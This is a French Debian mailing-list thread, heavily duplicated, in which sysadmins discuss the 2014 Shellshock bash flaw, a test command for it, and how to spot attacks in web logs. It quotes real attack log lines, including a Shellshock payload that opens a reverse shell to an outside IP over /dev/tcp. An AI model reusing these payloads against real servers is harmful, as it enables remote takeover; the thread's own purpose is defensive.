Le 26 sept. 14 à 11:44, Sébastien NOBILI a écrit :Bonjour,
Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit :Sur un serveur web, est-ce que le fait d'avoir le lien "/bin/sh"
vers dash
empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ?
Si tous les CGI utilisent « /bin/sh », alors pas de problème. En
revanche, ceux
qui utiliseraient explicitement « /bin/bash » seraient impactés.
La meilleure parade reste de toute façon la mise-à-jour de Bash…
Bien sûr. Ceci dit, et si la faille existe depuis 22 ans comme c'était
écrit dans l'article,
elle n'a sans doute pas été connue par énormément de pirates
potentiels… Ce n'est
certainement pas la peine de flipper.
Le 26 sept. 14 à 11:44, Sébastien NOBILI a écrit :
Bonjour,
Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit :
Sur un serveur web, est-ce que le fait d'avoir le lien "/bin/sh"
vers dash
empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ?
Si tous les CGI utilisent « /bin/sh », alors pas de problème. En
revanche, ceux
qui utiliseraient explicitement « /bin/bash » seraient impactés.
La meilleure parade reste de toute façon la mise-à-jour de Bash…
Bien sûr. Ceci dit, et si la faille existe depuis 22 ans comme c'était
écrit dans l'article,
elle n'a sans doute pas été connue par énormément de pirates
potentiels… Ce n'est
certainement pas la peine de flipper.
Le 26 sept. 14 à 11:44, Sébastien NOBILI a écrit :Bonjour,
Le vendredi 26 septembre 2014 à 11:03, Frédéric MASSOT a écrit :Sur un serveur web, est-ce que le fait d'avoir le lien "/bin/sh"
vers dash
empêche ce type d'attaque ou limite l'attaque à certain CGI mal écrit ?
Si tous les CGI utilisent « /bin/sh », alors pas de problème. En
revanche, ceux
qui utiliseraient explicitement « /bin/bash » seraient impactés.
La meilleure parade reste de toute façon la mise-à-jour de Bash…
Bien sûr. Ceci dit, et si la faille existe depuis 22 ans comme c'était
écrit dans l'article,
elle n'a sans doute pas été connue par énormément de pirates
potentiels… Ce n'est
certainement pas la peine de flipper.
Ah ? Si tu gères des serveurs web je te propose de faire un simple c at
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
Ah ? Si tu gères des serveurs web je te propose de faire un simple c at
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
Ah ? Si tu gères des serveurs web je te propose de faire un simple c at
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
écrit :Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/
ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
second exemple de logs sur un de mes serveurs, ce qui correspond à une
tentative d'implantation de porte dérobée
https://securelist.com/blog/research/66719/shellshock-and-its-early-
adopters/
Cordialement.
--
David Guyot
Administrateur système, réseau et télécom / Sysadmin
Europe Camions Interactive / Stockway
Moulin Collot
F-88500 Ambacourt
03 29 30 47 85
Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
écrit :
Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/
ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
second exemple de logs sur un de mes serveurs, ce qui correspond à une
tentative d'implantation de porte dérobée
https://securelist.com/blog/research/66719/shellshock-and-its-early-
adopters/
Cordialement.
--
David Guyot
Administrateur système, réseau et télécom / Sysadmin
Europe Camions Interactive / Stockway
Moulin Collot
F-88500 Ambacourt
03 29 30 47 85
Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
écrit :Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat
<fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/
ping
-c 1 198.101.206.138"
ou encore
202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.101/3333 0>&1'"
D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
second exemple de logs sur un de mes serveurs, ce qui correspond à une
tentative d'implantation de porte dérobée
https://securelist.com/blog/research/66719/shellshock-and-its-early-
adopters/
Cordialement.
--
David Guyot
Administrateur système, réseau et télécom / Sysadmin
Europe Camions Interactive / Stockway
Moulin Collot
F-88500 Ambacourt
03 29 30 47 85
Le 26 sept. 14 à 16:45, David Guyot a écrit :
>Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
>écrit :
>>Ah ? Si tu gères des serveurs web je te propose de faire un
>>simple cat
>><fichier log serveur web>|grep "() {" et de compter le nombre de
>>tentatives d'accès comme par exemple
>>
>>89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
>>/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;};
>>/bin/ping
>>-c 1 198.101.206.138"
>>
>>ou encore
>>
>>202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
>>HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
>>/dev/tcp/195.225.34.101/3333 0>&1'"
J'en ai aussi, mais pas autant que des exploits classiques sur des
CMS vérolés.
Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la
tête avec.
>D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
>second exemple de logs sur un de mes serveurs, ce qui correspond à une
>tentative d'implantation de porte dérobée —
>https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/
Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La
publication de la
faille va sûrement précipiter un paquets de gonziers à l'essayer un
peu partout…
Le 26 sept. 14 à 16:45, David Guyot a écrit :
>Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
>écrit :
>>Ah ? Si tu gères des serveurs web je te propose de faire un
>>simple cat
>><fichier log serveur web>|grep "() {" et de compter le nombre de
>>tentatives d'accès comme par exemple
>>
>>89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
>>/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;};
>>/bin/ping
>>-c 1 198.101.206.138"
>>
>>ou encore
>>
>>202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
>>HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
>>/dev/tcp/195.225.34.101/3333 0>&1'"
J'en ai aussi, mais pas autant que des exploits classiques sur des
CMS vérolés.
Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la
tête avec.
>D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
>second exemple de logs sur un de mes serveurs, ce qui correspond à une
>tentative d'implantation de porte dérobée —
>https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/
Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La
publication de la
faille va sûrement précipiter un paquets de gonziers à l'essayer un
peu partout…
Le 26 sept. 14 à 16:45, David Guyot a écrit :
>Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
>écrit :
>>Ah ? Si tu gères des serveurs web je te propose de faire un
>>simple cat
>><fichier log serveur web>|grep "() {" et de compter le nombre de
>>tentatives d'accès comme par exemple
>>
>>89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
>>/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;};
>>/bin/ping
>>-c 1 198.101.206.138"
>>
>>ou encore
>>
>>202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
>>HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
>>/dev/tcp/195.225.34.101/3333 0>&1'"
J'en ai aussi, mais pas autant que des exploits classiques sur des
CMS vérolés.
Et comme ça tombe aussi dans les 404… Je ne me prends pas trop la
tête avec.
>D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
>second exemple de logs sur un de mes serveurs, ce qui correspond à une
>tentative d'implantation de porte dérobée —
>https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/
Attention, je n'ai pas écrit non plus de ne pas faire de m-à-j ! La
publication de la
faille va sûrement précipiter un paquets de gonziers à l'essayer un
peu partout…
On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:env x='() { :;}; echo vulnerable' bash -c 'echo hello'
J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :
"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"
Quid ?
André
On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:
env x='() { :;}; echo vulnerable' bash -c 'echo hello'
J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :
"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"
Quid ?
André
On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:env x='() { :;}; echo vulnerable' bash -c 'echo hello'
J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :
"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"
Quid ?
André
C'est parfait car c'est patché !
C'est parfait car c'est patché !
C'est parfait car c'est patché !
pendant ce temps ca scanne sévère:
() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a
je vois ça sur mon site de production.
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet
"unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
pendant ce temps ca scanne sévère:
() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a
je vois ça sur mon site de production.
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet
"unsubscribe"
vers debian-user-french-REQUEST@lists.debian.org
En cas de soucis, contactez EN ANGLAIS listmaster@lists.debian.org
Archive: https://lists.debian.org/5425D216.1050808@freeatome.com
pendant ce temps ca scanne sévère:
() { :;}; /bin/bash -c "echo testing9123123"; /bin/uname -a
je vois ça sur mon site de production.
--
Lisez la FAQ de la liste avant de poser une question :
http://wiki.debian.org/fr/FrenchLists
Pour vous DESABONNER, envoyez un message avec comme objet
"unsubscribe"
vers
En cas de soucis, contactez EN ANGLAIS
Archive: https://lists.debian.org/
Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat <fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat <fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
Ah ? Si tu gères des serveurs web je te propose de faire un simple
cat <fichier log serveur web>|grep "() {" et de compter le nombre de
tentatives d'accès comme par exemple
Le 26/09/2014 11:16, a écrit :On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:env x='() { :;}; echo vulnerable' bash -c 'echo hello'
J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :
"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"
Quid ?
André
C'est parfait car c'est patché !
linuxement vôtre,
Le 26/09/2014 11:16, andre_debian@numericable.fr a écrit :
On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:
env x='() { :;}; echo vulnerable' bash -c 'echo hello'
J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :
"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"
Quid ?
André
C'est parfait car c'est patché !
linuxement vôtre,
Le 26/09/2014 11:16, a écrit :On Friday 26 September 2014 07:56:06 JUPIN Alain wrote:env x='() { :;}; echo vulnerable' bash -c 'echo hello'
J'ai upgradé bash et relancé, tapé la commande ci-dessus
et j'ai ce message de warning :
"bash: warning: x: ignoring function definition attempt
bash: erreur lors de l'import de la définition de fonction pour « x »
hello"
Quid ?
André
C'est parfait car c'est patché !
linuxement vôtre,